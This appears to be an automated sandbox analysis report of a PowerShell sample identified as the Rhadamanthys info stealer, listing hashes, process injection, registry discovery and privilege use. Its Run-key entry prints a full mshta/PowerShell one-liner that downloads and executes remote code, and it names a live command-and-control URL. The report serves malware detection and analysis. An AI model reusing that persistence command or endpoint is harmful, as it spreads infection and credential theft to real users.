Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2025 14:26
Static task
static1
Behavioral task
behavioral1
Sample
chutmarao.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
chutmarao.ps1
Resource
win10v2004-20241007-en
General
-
Target
chutmarao.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Malware Config
Extracted
rhadamanthys
https://185.196.8.68:9367/ab43097ee4f6e091aed46f79/88pw46v5.ki88g
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2536 created 2624 2536 RegSvcs.exe 44 PID 1424 created 2624 1424 RegSvcs.exe 44 -
Deletes itself 1 IoCs
pid Process 2268 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderlt-73 = "mshta \"javascript:yg=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(yg[2])[yg[0]](yg[1], 0, true);close();ix=new ActiveXObject('Scripting.FileSystemObject');ix.DeleteFile(WScript.ScriptFullName);\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defenderl-65 = "schtasks /run /tn Defenderl-65" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2268 set thread context of 1424 2268 powershell.exe 91 PID 2268 set thread context of 2536 2268 powershell.exe 92 PID 2268 set thread context of 4300 2268 powershell.exe 93 PID 2268 set thread context of 4564 2268 powershell.exe 94 PID 2268 set thread context of 4088 2268 powershell.exe 95 PID 2268 set thread context of 1920 2268 powershell.exe 96 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 2268 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2536 RegSvcs.exe 2536 RegSvcs.exe 1424 RegSvcs.exe 1424 RegSvcs.exe 1080 openwith.exe 1080 openwith.exe 1080 openwith.exe 1080 openwith.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2268 powershell.exe Token: SeRestorePrivilege 2664 dw20.exe Token: SeBackupPrivilege 2664 dw20.exe Token: SeBackupPrivilege 2664 dw20.exe Token: SeBackupPrivilege 2664 dw20.exe Token: SeBackupPrivilege 2664 dw20.exe Token: SeBackupPrivilege 764 dw20.exe Token: SeBackupPrivilege 764 dw20.exe Token: SeBackupPrivilege 1268 dw20.exe Token: SeBackupPrivilege 1268 dw20.exe Token: SeIncreaseQuotaPrivilege 2268 powershell.exe Token: SeSecurityPrivilege 2268 powershell.exe Token: SeTakeOwnershipPrivilege 2268 powershell.exe Token: SeLoadDriverPrivilege 2268 powershell.exe Token: SeSystemProfilePrivilege 2268 powershell.exe Token: SeSystemtimePrivilege 2268 powershell.exe Token: SeProfSingleProcessPrivilege 2268 powershell.exe Token: SeIncBasePriorityPrivilege 2268 powershell.exe Token: SeCreatePagefilePrivilege 2268 powershell.exe Token: SeBackupPrivilege 2268 powershell.exe Token: SeRestorePrivilege 2268 powershell.exe Token: SeShutdownPrivilege 2268 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeSystemEnvironmentPrivilege 2268 powershell.exe Token: SeRemoteShutdownPrivilege 2268 powershell.exe Token: SeUndockPrivilege 2268 powershell.exe Token: SeManageVolumePrivilege 2268 powershell.exe Token: 33 2268 powershell.exe Token: 34 2268 powershell.exe Token: 35 2268 powershell.exe Token: 36 2268 powershell.exe Token: SeBackupPrivilege 4460 dw20.exe Token: SeBackupPrivilege 4460 dw20.exe Token: SeIncreaseQuotaPrivilege 2268 powershell.exe Token: SeSecurityPrivilege 2268 powershell.exe Token: SeTakeOwnershipPrivilege 2268 powershell.exe Token: SeLoadDriverPrivilege 2268 powershell.exe Token: SeSystemProfilePrivilege 2268 powershell.exe Token: SeSystemtimePrivilege 2268 powershell.exe Token: SeProfSingleProcessPrivilege 2268 powershell.exe Token: SeIncBasePriorityPrivilege 2268 powershell.exe Token: SeCreatePagefilePrivilege 2268 powershell.exe Token: SeBackupPrivilege 2268 powershell.exe Token: SeRestorePrivilege 2268 powershell.exe Token: SeShutdownPrivilege 2268 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeSystemEnvironmentPrivilege 2268 powershell.exe Token: SeRemoteShutdownPrivilege 2268 powershell.exe Token: SeUndockPrivilege 2268 powershell.exe Token: SeManageVolumePrivilege 2268 powershell.exe Token: 33 2268 powershell.exe Token: 34 2268 powershell.exe Token: 35 2268 powershell.exe Token: 36 2268 powershell.exe Token: SeIncreaseQuotaPrivilege 2268 powershell.exe Token: SeSecurityPrivilege 2268 powershell.exe Token: SeTakeOwnershipPrivilege 2268 powershell.exe Token: SeLoadDriverPrivilege 2268 powershell.exe Token: SeSystemProfilePrivilege 2268 powershell.exe Token: SeSystemtimePrivilege 2268 powershell.exe Token: SeProfSingleProcessPrivilege 2268 powershell.exe Token: SeIncBasePriorityPrivilege 2268 powershell.exe Token: SeCreatePagefilePrivilege 2268 powershell.exe Token: SeBackupPrivilege 2268 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 1424 2268 powershell.exe 91 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 2536 2268 powershell.exe 92 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4300 2268 powershell.exe 93 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4564 2268 powershell.exe 94 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 4088 2268 powershell.exe 95 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 2268 wrote to memory of 1920 2268 powershell.exe 96 PID 1920 wrote to memory of 2664 1920 Msbuild.exe 97 PID 1920 wrote to memory of 2664 1920 Msbuild.exe 97 PID 1920 wrote to memory of 2664 1920 Msbuild.exe 97 PID 4564 wrote to memory of 1268 4564 RegSvcs.exe 98 PID 4564 wrote to memory of 1268 4564 RegSvcs.exe 98 PID 4564 wrote to memory of 1268 4564 RegSvcs.exe 98 PID 4088 wrote to memory of 764 4088 Msbuild.exe 99 PID 4088 wrote to memory of 764 4088 Msbuild.exe 99 PID 4088 wrote to memory of 764 4088 Msbuild.exe 99 PID 4300 wrote to memory of 4460 4300 RegSvcs.exe 100 PID 4300 wrote to memory of 4460 4300 RegSvcs.exe 100 PID 4300 wrote to memory of 4460 4300 RegSvcs.exe 100 PID 2536 wrote to memory of 1080 2536 RegSvcs.exe 102 PID 2536 wrote to memory of 1080 2536 RegSvcs.exe 102 PID 2536 wrote to memory of 1080 2536 RegSvcs.exe 102 PID 2536 wrote to memory of 1080 2536 RegSvcs.exe 102
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2624
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\chutmarao.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2536
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7483⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9123⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7923⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7803⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
315B
MD569acc92e6df5c35cf75eded8f61ddeaa
SHA1b405090a2f92f85490705dcf77a6461ad85e7e20
SHA256da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698
SHA5129b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82